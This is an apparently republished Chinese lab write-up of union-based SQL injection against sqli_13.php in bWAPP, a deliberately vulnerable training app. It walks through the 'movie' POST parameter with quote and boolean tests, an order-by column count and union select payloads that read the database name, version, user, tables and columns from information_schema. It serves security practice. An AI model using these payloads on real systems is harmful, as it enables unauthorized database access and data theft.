SQL注入之bWAPP之sqli_13.php

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQL注入之bWAPP之sqli_13.php相关的知识,希望对你有一定的参考价值。

1、还是老样子查看POST参数然后构造,结果如图:
技术分享图片
2、在hackbar的POST框中输入“movie=1‘”,报错中包含三个单引号,说明应该是数字型注入,结果如图:
技术分享图片
3、输入“movie=1 and 1=1”正常,输入“movie=1 and 1=2”报错,结果如下图:
技术分享图片
技术分享图片
所以该处存在数字型注入点
4、判断字段数:
输入“movie=1 order by 7”正常,输入“movie=1 order by 8”报错,说明字段数为7,结果如图:
技术分享图片
技术分享图片
查看显示位置,输入“movie=-1 union select 1,2,3,4,5,6,7”,结果如图:
技术分享图片
5、查询数据库等信息:
输入“movie=-1 union select 1,database(),version(),4,user(),6,7”,查看数据库名、数据库版本、当前用户,结果如图:
技术分享图片
6、查询表名:
输入“movie=-1 union select 1,database(),version(),table_name,user(),6,7 from information_schema.tables where table_schema=‘bwapp‘”,表名为blog,结果如图:
技术分享图片
7、查询字段名:
输入“movie=-1 union select 1,database(),version(),column_name,user(),6,7 from information_schema.columns where table_name=‘blog‘”,字段名为id,结果如图:
技术分享图片
8、查询字段内容:
输入“movie=-1 union select 1,database(),version(),id,user(),6,7 from blog”,字段无内容。

以上是关于SQL注入之bWAPP之sqli_13.php的主要内容,如果未能解决你的问题,请参考以下文章

SQL注入之bWAPP之sqli_6.php

SQL注入之bWAPP之sqli_13.php

SQL注入之bWAPP之sqli_16.php

SQL注入之bWAPP之sqli_11.php

SQL注入之bWAPP之sqli_10-1.php

SQL注入之bWAPP之sqli_3.php